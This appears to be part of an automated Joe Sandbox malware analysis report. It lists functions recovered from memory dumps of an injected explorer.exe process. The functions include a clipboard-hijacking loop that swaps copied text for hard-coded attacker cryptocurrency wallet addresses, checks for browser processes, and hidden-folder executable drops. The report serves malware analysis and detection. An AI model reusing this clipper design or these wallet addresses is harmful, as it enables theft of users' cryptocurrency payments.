                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
                                                                                                                                                                                                                        • String ID: 2.5
                                                                                                                                                                                                                        • API String ID: 2800961625-2233083363
                                                                                                                                                                                                                        • Opcode ID: e486100a408e8a09d9c892e745f7fcd54317b0b843c8af37b398ee0991724894
                                                                                                                                                                                                                        • Instruction ID: 0e8f01f104b7ab06250bc9d76e06befa1970cfb053e1c37d3ecfec4254e2ceb3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e486100a408e8a09d9c892e745f7fcd54317b0b843c8af37b398ee0991724894
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79417132614A81CAEB24DF71E8447DEB7A5FB88788F844116EA4D47B6CEF78C245CB00
                                                                                                                                                                                                                        Function 0B0A8660 Relevance: 9.1, APIs: 6, Instructions: 73memorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3234909527-0
                                                                                                                                                                                                                        • Opcode ID: 543581bef6e94fe27694f519775bfffcbdf9333420061ca6165c68780d132ee0
                                                                                                                                                                                                                        • Instruction ID: 5227650175ca58ae5a0a8ed76bd0738861f5ea098eed06800c447aa4ebb5a5bb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 543581bef6e94fe27694f519775bfffcbdf9333420061ca6165c68780d132ee0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8231C032600B40C6EB68CF61E44076EB7A2FB88B98F08C625DA5D47798DF3CD045CB41
                                                                                                                                                                                                                        Function 0DFEB2C0 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 101stringthreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
                                                                                                                                                                                                                        • String ID: brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 936357808-3480109235
                                                                                                                                                                                                                        • Opcode ID: 7841887d252611b6ad7024bbde32188e0b77ce862361a49901064f6a18fe948f
                                                                                                                                                                                                                        • Instruction ID: 669b8e7272ac2e050cb500b014d51bb0e85f7f55fc0b7fdc8e30bd7f7a698a79
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7841887d252611b6ad7024bbde32188e0b77ce862361a49901064f6a18fe948f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A41807121868681EB54EFBDFC543AA3355BF887C4F45803A9A4B4A625DFBCC5C8CB60
                                                                                                                                                                                                                        Function 0DF0B2C0 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 101stringthreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
                                                                                                                                                                                                                        • String ID: brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 936357808-3480109235
                                                                                                                                                                                                                        • Opcode ID: 7841887d252611b6ad7024bbde32188e0b77ce862361a49901064f6a18fe948f
                                                                                                                                                                                                                        • Instruction ID: 1f4022a49c79da5365b9756b53979725e108579c46d216d0bb51d40301e1391d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7841887d252611b6ad7024bbde32188e0b77ce862361a49901064f6a18fe948f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2418321218646C2EB14EFB9FC5437A2755BF88784F46D03B9A4B472A5DF3CC288DB60
                                                                                                                                                                                                                        Function 0B0BB2C0 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 101stringthreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
                                                                                                                                                                                                                        • String ID: brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 936357808-3480109235
                                                                                                                                                                                                                        • Opcode ID: 7841887d252611b6ad7024bbde32188e0b77ce862361a49901064f6a18fe948f
                                                                                                                                                                                                                        • Instruction ID: 4b58797f3cfebeedda975426e74f4d3d9086f0fb2b5f1ba94c69c39cd2129935
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7841887d252611b6ad7024bbde32188e0b77ce862361a49901064f6a18fe948f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A41C131314A4286EB5CEF75FC96BEB37A2FF88B80F800426994A46224EF7CC148C351
                                                                                                                                                                                                                        Function 0B0AF170 Relevance: 16.6, APIs: 11, Instructions: 112memoryfileCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3250796435-0
                                                                                                                                                                                                                        • Opcode ID: 0a607bf21309d90129901fbe76862cdc2aade6855692662ea219d9fad2cac3af
                                                                                                                                                                                                                        • Instruction ID: c4e509d68aa950ef39f7eea26911332da5af8b4ffacfaced447bf2ea9e47db90
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a607bf21309d90129901fbe76862cdc2aade6855692662ea219d9fad2cac3af
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D418E36700B4287EB94CFA6E85476A7BA5F788F90F144625CE5E83B54EF38C0498B10
                                                                                                                                                                                                                        Function 0B0AEF20 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 53stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0B0AEDF0: GetWindowsDirectoryW.KERNEL32 ref: 0B0AEE43
                                                                                                                                                                                                                          • Part of subcall function 0B0AEDF0: GetVolumeInformationW.KERNEL32 ref: 0B0AEE92
                                                                                                                                                                                                                          • Part of subcall function 0B0AEDF0: wsprintfW.USER32 ref: 0B0AEEF4
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32 ref: 0B0AEF85
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0B0AEF95
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0B0AEFA3
                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32 ref: 0B0AEFAE
                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32 ref: 0B0AEFBC
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0B0AEFCC
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0B0AEFDA
                                                                                                                                                                                                                        • lstrcatW.KERNEL32 ref: 0B0AEFEA
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: 8cda6bf699b11194287b385e9dca5f54407a9181ab1747b4e183116ebe9e3583
                                                                                                                                                                                                                        • Instruction ID: 2e16419cea45805781a8d2fa792b7c73bb2e7e553987812e8bfdaeaf7c6feae1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8cda6bf699b11194287b385e9dca5f54407a9181ab1747b4e183116ebe9e3583
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68212472318B5286EB94DF25F85875E37A2FB89B40F416235DA8E87718EF39C518C701
                                                                                                                                                                                                                        Function 0B0AF010 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 48stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0B0AECD0: GetWindowsDirectoryA.KERNEL32 ref: 0B0AED1C
                                                                                                                                                                                                                          • Part of subcall function 0B0AECD0: GetVolumeInformationA.KERNEL32 ref: 0B0AED66
                                                                                                                                                                                                                          • Part of subcall function 0B0AECD0: wsprintfA.USER32 ref: 0B0AEDC7
                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32 ref: 0B0AF063
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0B0AF073
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0B0AF081
                                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32 ref: 0B0AF08C
                                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32 ref: 0B0AF09A
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0B0AF0AA
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0B0AF0B8
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0B0AF0C8
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: 9adc26f88c8acaf0b2b7dee1d1ac7080130c72d70f73d82a369a8dadedcda82c
                                                                                                                                                                                                                        • Instruction ID: 556726174447413f4143739f2d3f5f75403c87c411efc74a2bcddc4dea4f6762
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9adc26f88c8acaf0b2b7dee1d1ac7080130c72d70f73d82a369a8dadedcda82c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B113A72224B4286EB449F25FC5475AB7A2F789B80F442221DA8F47B28DF7CC04D8B05
                                                                                                                                                                                                                        Function 0DFE73B0 Relevance: 15.3, APIs: 1, Strings: 9, Instructions: 332sleepCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 1274 dfe73b0-dfe73da call dfe7a00 1277 dfe73e0-dfe7416 call dfe7960 call dfd2c10 call dfe72a0 call dfe7a90 1274->1277 1286 dfe747b-dfe74a8 call dfd2c10 call dfe72a0 call dfe7a90 1277->1286 1287 dfe7418-dfe7476 call dfd1100 call dfd2c10 call dfe72a0 call dfe7b00 call dfd2c10 call dfe7b50 call dfd1200 1277->1287 1300 dfe750d-dfe753a call dfd2c10 call dfe72a0 call dfe7a90 1286->1300 1301 dfe74aa-dfe7508 call dfd1100 call dfd2c10 call dfe72a0 call dfe7b00 call dfd2c10 call dfe7b50 call dfd1200 1286->1301 1287->1286 1321 dfe759f-dfe75cc call dfd2c10 call dfe72a0 call dfe7a90 1300->1321 1322 dfe753c-dfe759a call dfd1100 call dfd2c10 call dfe72a0 call dfe7b00 call dfd2c10 call dfe7b50 call dfd1200 1300->1322 1301->1300 1342 dfe75ce-dfe762c call dfd1100 call dfd2c10 call dfe72a0 call dfe7b00 call dfd2c10 call dfe7b50 call dfd1200 1321->1342 1343 dfe7631-dfe765e call dfd2c10 call dfe72a0 call dfe7a90 1321->1343 1322->1321 1342->1343 1363 dfe76c3-dfe76f0 call dfd2c10 call dfe72a0 call dfe7a90 1343->1363 1364 dfe7660-dfe76be call dfd1100 call dfd2c10 call dfe72a0 call dfe7b00 call dfd2c10 call dfe7b50 call dfd1200 1343->1364 1384 dfe7755-dfe7782 call dfd2c10 call dfe72a0 call dfe7a90 1363->1384 1385 dfe76f2-dfe7750 call dfd1100 call dfd2c10 call dfe72a0 call dfe7b00 call dfd2c10 call dfe7b50 call dfd1200 1363->1385 1364->1363 1405 dfe77e7-dfe7814 call dfd2c10 call dfe72a0 call dfe7a90 1384->1405 1406 dfe7784-dfe77e2 call dfd1100 call dfd2c10 call dfe72a0 call dfe7b00 call dfd2c10 call dfe7b50 call dfd1200 1384->1406 1385->1384 1426 dfe7879-dfe78a6 call dfd2c10 call dfe72a0 call dfe7a90 1405->1426 1427 dfe7816-dfe7874 call dfd1100 call dfd2c10 call dfe72a0 call dfe7b00 call dfd2c10 call dfe7b50 call dfd1200 1405->1427 1406->1405 1447 dfe790b-dfe791a Sleep call dfd1200 1426->1447 1448 dfe78a8-dfe7906 call dfd1100 call dfd2c10 call dfe72a0 call dfe7b00 call dfd2c10 call dfe7b50 call dfd1200 1426->1448 1427->1426 1453 dfe791f 1447->1453 1448->1447 1453->1277
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFE7960: OpenClipboard.USER32 ref: 0DFE7971
                                                                                                                                                                                                                          • Part of subcall function 0DFE7960: GetClipboardData.USER32 ref: 0DFE7983
                                                                                                                                                                                                                          • Part of subcall function 0DFE7960: GlobalLock.KERNEL32 ref: 0DFE7994
                                                                                                                                                                                                                          • Part of subcall function 0DFE7960: GlobalUnlock.KERNEL32 ref: 0DFE79A5
                                                                                                                                                                                                                          • Part of subcall function 0DFE7960: CloseClipboard.USER32 ref: 0DFE79AB
                                                                                                                                                                                                                          • Part of subcall function 0DFE7B50: GlobalAlloc.KERNEL32 ref: 0DFE7B78
                                                                                                                                                                                                                          • Part of subcall function 0DFE7B50: GlobalLock.KERNEL32 ref: 0DFE7B8F
                                                                                                                                                                                                                          • Part of subcall function 0DFE7B50: GlobalUnlock.KERNEL32 ref: 0DFE7BA7
                                                                                                                                                                                                                          • Part of subcall function 0DFE7B50: OpenClipboard.USER32 ref: 0DFE7BAF
                                                                                                                                                                                                                          • Part of subcall function 0DFE7B50: EmptyClipboard.USER32 ref: 0DFE7BB5
                                                                                                                                                                                                                          • Part of subcall function 0DFE7B50: SetClipboardData.USER32 ref: 0DFE7BC3
                                                                                                                                                                                                                          • Part of subcall function 0DFE7B50: CloseClipboard.USER32 ref: 0DFE7BC9
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0DFE7910
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5, xrefs: 0DFE7816
                                                                                                                                                                                                                        • XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH, xrefs: 0DFE78A8
                                                                                                                                                                                                                        • rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv, xrefs: 0DFE7784
                                                                                                                                                                                                                        • 0xe082eae973143a32d82db061b6c8885ceba72b87, xrefs: 0DFE74AA
                                                                                                                                                                                                                        • addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 0DFE76F2
                                                                                                                                                                                                                        • TLTeZMYasNjJd7vSwUvAFPogmBJNruznWP, xrefs: 0DFE753C
                                                                                                                                                                                                                        • 1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6, xrefs: 0DFE7418
                                                                                                                                                                                                                        • bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze, xrefs: 0DFE7660
                                                                                                                                                                                                                        • LRjCGBFrHsFFehN2kCNc6ds8icUCgLZ6KP, xrefs: 0DFE75CE
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
                                                                                                                                                                                                                        • String ID: 0xe082eae973143a32d82db061b6c8885ceba72b87$1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LRjCGBFrHsFFehN2kCNc6ds8icUCgLZ6KP$TLTeZMYasNjJd7vSwUvAFPogmBJNruznWP$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                                                                                                                                                        • API String ID: 2992153386-1711154317
                                                                                                                                                                                                                        • Opcode ID: c2027276df41a280542b9053d2a0a86dc6f6c0e9b652ba46b6aad876b9673944
                                                                                                                                                                                                                        • Instruction ID: 79ff3a7f0ab2c2450a931f2dfcd6c1914141c9cb8a30be2a12e7d1541bdf89da
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2027276df41a280542b9053d2a0a86dc6f6c0e9b652ba46b6aad876b9673944
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42D13E61715642A5EF00FFA9E8942DC3326E7547CCFC684129F0DABA68EF74CA49C390
                                                                                                                                                                                                                        Function 0DF073B0 Relevance: 15.3, APIs: 1, Strings: 9, Instructions: 332sleepCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 1077 df073b0-df073da call df07a00 1080 df073e0-df07416 call df07960 call def2c10 call df072a0 call df07a90 1077->1080 1089 df07418-df07476 call def1100 call def2c10 call df072a0 call df07b00 call def2c10 call df07b50 call def1200 1080->1089 1090 df0747b-df074a8 call def2c10 call df072a0 call df07a90 1080->1090 1089->1090 1103 df074aa-df07508 call def1100 call def2c10 call df072a0 call df07b00 call def2c10 call df07b50 call def1200 1090->1103 1104 df0750d-df0753a call def2c10 call df072a0 call df07a90 1090->1104 1103->1104 1124 df0753c-df0759a call def1100 call def2c10 call df072a0 call df07b00 call def2c10 call df07b50 call def1200 1104->1124 1125 df0759f-df075cc call def2c10 call df072a0 call df07a90 1104->1125 1124->1125 1145 df07631-df0765e call def2c10 call df072a0 call df07a90 1125->1145 1146 df075ce-df0762c call def1100 call def2c10 call df072a0 call df07b00 call def2c10 call df07b50 call def1200 1125->1146 1166 df07660-df076be call def1100 call def2c10 call df072a0 call df07b00 call def2c10 call df07b50 call def1200 1145->1166 1167 df076c3-df076f0 call def2c10 call df072a0 call df07a90 1145->1167 1146->1145 1166->1167 1187 df076f2-df07750 call def1100 call def2c10 call df072a0 call df07b00 call def2c10 call df07b50 call def1200 1167->1187 1188 df07755-df07782 call def2c10 call df072a0 call df07a90 1167->1188 1187->1188 1208 df07784-df077e2 call def1100 call def2c10 call df072a0 call df07b00 call def2c10 call df07b50 call def1200 1188->1208 1209 df077e7-df07814 call def2c10 call df072a0 call df07a90 1188->1209 1208->1209 1229 df07816-df07874 call def1100 call def2c10 call df072a0 call df07b00 call def2c10 call df07b50 call def1200 1209->1229 1230 df07879-df078a6 call def2c10 call df072a0 call df07a90 1209->1230 1229->1230 1250 df078a8-df07906 call def1100 call def2c10 call df072a0 call df07b00 call def2c10 call df07b50 call def1200 1230->1250 1251 df0790b-df0791a Sleep call def1200 1230->1251 1250->1251 1256 df0791f 1251->1256 1256->1080
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DF07960: OpenClipboard.USER32 ref: 0DF07971
                                                                                                                                                                                                                          • Part of subcall function 0DF07960: GetClipboardData.USER32 ref: 0DF07983
                                                                                                                                                                                                                          • Part of subcall function 0DF07960: GlobalLock.KERNEL32 ref: 0DF07994
                                                                                                                                                                                                                          • Part of subcall function 0DF07960: GlobalUnlock.KERNEL32 ref: 0DF079A5
                                                                                                                                                                                                                          • Part of subcall function 0DF07960: CloseClipboard.USER32 ref: 0DF079AB
                                                                                                                                                                                                                          • Part of subcall function 0DF07B50: GlobalAlloc.KERNEL32 ref: 0DF07B78
                                                                                                                                                                                                                          • Part of subcall function 0DF07B50: GlobalLock.KERNEL32 ref: 0DF07B8F
                                                                                                                                                                                                                          • Part of subcall function 0DF07B50: GlobalUnlock.KERNEL32 ref: 0DF07BA7
                                                                                                                                                                                                                          • Part of subcall function 0DF07B50: OpenClipboard.USER32 ref: 0DF07BAF
                                                                                                                                                                                                                          • Part of subcall function 0DF07B50: EmptyClipboard.USER32 ref: 0DF07BB5
                                                                                                                                                                                                                          • Part of subcall function 0DF07B50: SetClipboardData.USER32 ref: 0DF07BC3
                                                                                                                                                                                                                          • Part of subcall function 0DF07B50: CloseClipboard.USER32 ref: 0DF07BC9
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0DF07910
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH, xrefs: 0DF078A8
                                                                                                                                                                                                                        • LRjCGBFrHsFFehN2kCNc6ds8icUCgLZ6KP, xrefs: 0DF075CE
                                                                                                                                                                                                                        • TLTeZMYasNjJd7vSwUvAFPogmBJNruznWP, xrefs: 0DF0753C
                                                                                                                                                                                                                        • rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv, xrefs: 0DF07784
                                                                                                                                                                                                                        • bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze, xrefs: 0DF07660
                                                                                                                                                                                                                        • DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5, xrefs: 0DF07816
                                                                                                                                                                                                                        • addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 0DF076F2
                                                                                                                                                                                                                        • 0xe082eae973143a32d82db061b6c8885ceba72b87, xrefs: 0DF074AA
                                                                                                                                                                                                                        • 1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6, xrefs: 0DF07418
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
                                                                                                                                                                                                                        • String ID: 0xe082eae973143a32d82db061b6c8885ceba72b87$1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LRjCGBFrHsFFehN2kCNc6ds8icUCgLZ6KP$TLTeZMYasNjJd7vSwUvAFPogmBJNruznWP$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
                                                                                                                                                                                                                        • API String ID: 2992153386-1711154317
